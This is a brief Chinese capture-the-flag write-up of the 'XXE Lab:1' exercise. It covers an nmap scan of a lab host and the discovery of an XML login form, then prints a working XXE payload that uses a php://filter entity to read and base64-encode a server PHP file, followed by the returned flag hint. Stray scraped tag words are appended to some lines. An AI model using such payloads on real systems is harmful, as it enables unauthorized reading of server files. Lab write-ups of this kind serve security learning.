XXE Lab:1题解

思路

题目已经提示是XXE的专项练习,因此,直接找XXE问题.php

难度

入门html

端口扫描

nmap -sS -A 10.129.10.64

发现HTTP服务、Apache 2.4.27中间件、robots.txt泄漏了目录和文件
XXE Lab:1题解ide

80端口检查

其中,/xxe/index.php页面经过xml格式提交用户名和密码,因而,此处即为XXE所在位置。
构造以下payload,读取页面源码,得到一不知是flag仍是flag Hint的内容:code

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]>
<root><name>&admin;</name><password>123</password></root>

响应:xml

<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->

因而,陷入蒙蔽。。。。等待做者反馈中htm

相关文章
相关标签/搜索